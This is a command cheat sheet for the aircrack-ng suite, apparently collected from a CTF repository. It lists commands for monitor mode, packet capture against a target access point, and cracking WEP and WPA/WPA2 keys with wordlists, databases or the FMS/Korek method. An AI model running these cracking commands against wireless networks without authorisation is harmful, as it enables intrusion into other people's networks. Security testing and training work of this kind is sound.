% Wifi Cheat Sheet / wireless - aircrack-ng


# michael <truckiewow>
# Jose Moruno Cadima  <sniferl4bs>
# from here: https://github.com/thezakman/CTF-Heaven/blob/master/Cheatsheets/aircrack-ng
# added to navi by esp0xdeadbeef


# Start Monitor Mode and Save captures
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#iw -c iw dev wlan0 add interface mon0 type monitor
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c airmon-ng start wlan0 <Chanel>

# packet capture
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c airodump-ng -c <Chanel> --bssid <MAC_AP> -w aircrack_ng.cap <InterfaceMonitor>

# To crack WEP for a given essid name and store into a file
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -a 1 -e <essid> -l <output_file> aircrack_ng.cap

# To crack WPA/WPA2 from airolib-ng database
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -e <essid> -r <database> aircrack_ng.cap

# To crack WPA/WPA2 from a wordlist
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -e <essid> -w <wordlist> aircrack_ng.cap

# To crack a given bssid
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -b <bssid> -l <output_file> aircrack_ng.cap

# To crack a given bssid using FMS/Korek method
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -K -b <bssid> aircrack_ng.cap

# To crack a given essid (WEP) and display the ASCII of the key
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -e <essid> -s aircrack_ng.cap

# To crack a given essid (WEP) and create a EWSA Project
NIXPKGS_ALLOW_UNFREE=1 nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#aircrack-ng -c aircrack-ng -e <essid> -E <EWSA_file> aircrack_ng.cap
